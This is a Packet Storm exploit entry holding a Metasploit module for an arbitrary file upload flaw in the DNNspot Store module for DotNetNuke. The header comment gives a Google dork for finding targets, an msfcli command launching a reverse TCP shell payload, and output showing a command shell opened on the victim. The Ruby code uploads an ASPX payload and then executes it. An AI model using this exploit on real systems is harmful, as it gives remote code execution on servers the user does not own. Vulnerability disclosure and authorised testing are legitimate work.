DotNetNuke DNNspot Store (UploadifyHandler.ashx) 3.0.0 File Upload

2014-10-22T00:00:00
ID PACKETSTORM:128804
Type packetstorm
Reporter Glafkos Charalambous
Modified 2014-10-22T00:00:00

Description

                                        
                                            `# Exploit Title: DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload  
# Date: 23/01/2014  
# Author: Glafkos Charalambous  
# Version: 3.0.0  
# Vendor: DNNspot  
# Vendor URL: https://www.dnnspot.com  
# Google Dork: inurl:/DesktopModules/DNNspot-Store/  
#  
# root@kali:~# msfcli exploit/windows/http/dnnspot_upload_exec payload=windows/shell/reverse_tcp LHOST=192.168.13.37 LPORT=31337 RHOST=192.168.31.33 RPORT=80 E  
# [*] Initializing modules...  
# payload => windows/shell/reverse_tcp  
# LHOST => 192.168.13.37  
# LPORT => 31337  
# RHOST => 192.168.31.33  
# [-] Handler failed to bind to 192.168.13.37:31337  
# [*] Started reverse handler on 0.0.0.0:31337   
# [*] 192.168.31.33:80 - Uploading payload...  
# [*] 192.168.31.33:80 - Executing payload trrnegmv.aspx  
# [*] Encoded stage with x86/shikata_ga_nai  
# [*] Sending encoded stage (267 bytes) to 192.168.31.33  
# [*] Command shell session 1 opened (192.168.13.37:31337 -> 192.168.31.33:56806) at 2014-08-28 20:56:23 +0300  
# [+] Deleted trrnegmv.aspx  
#   
# Microsoft Windows [Version 6.2.9200]  
# (c) 2012 Microsoft Corporation. All rights reserved.  
#   
# C:\Windows\SysWOW64\inetsrv>  
#  
  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload',  
'Description' => %q{  
This module exploits an arbitrary file upload vulnerability found in DotNetNuke DNNspot Store  
module versions below 3.0.0.  
},  
'Author' =>  
[  
'Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>'  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'URL', 'http://metasploit.com' ]  
],  
'Platform' => 'win',  
'Arch' => ARCH_X86,  
'Privileged' => false,  
'Targets' =>  
[  
[ 'DNNspot-Store / Windows', {} ],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jul 21 2014'))  
end  
  
def check  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx")  
})  
  
if res and res.code == 200  
return Exploit::CheckCode::Detected  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
def exploit  
@payload_name = "#{rand_text_alpha_lower(8)}.aspx"  
exe = generate_payload_exe  
aspx = Msf::Util::EXE.to_exe_aspx(exe)  
post_data = Rex::MIME::Message.new  
post_data.add_part(aspx, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")  
post_data.add_part("/DesktopModules/DNNspot-Store/ProductPhotos/", nil, nil, "form-data; name=\"folder\"")  
post_data.add_part("1", nil, nil, "form-data; name=\"productId\"")  
post_data.add_part("w00t", nil, nil, "form-data; name=\"type\"")  
data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')  
  
print_status("#{peer} - Uploading payload...")  
res = send_request_cgi({  
"method" => "POST",  
"uri" => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx"),  
"data" => data,  
"ctype" => "multipart/form-data; boundary=#{post_data.bound}"  
})  
  
unless res and res.code == 200  
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")  
end  
  
register_files_for_cleanup(@payload_name)  
  
print_status("#{peer} - Executing payload #{@payload_name}")  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name)  
})  
end  
end  
`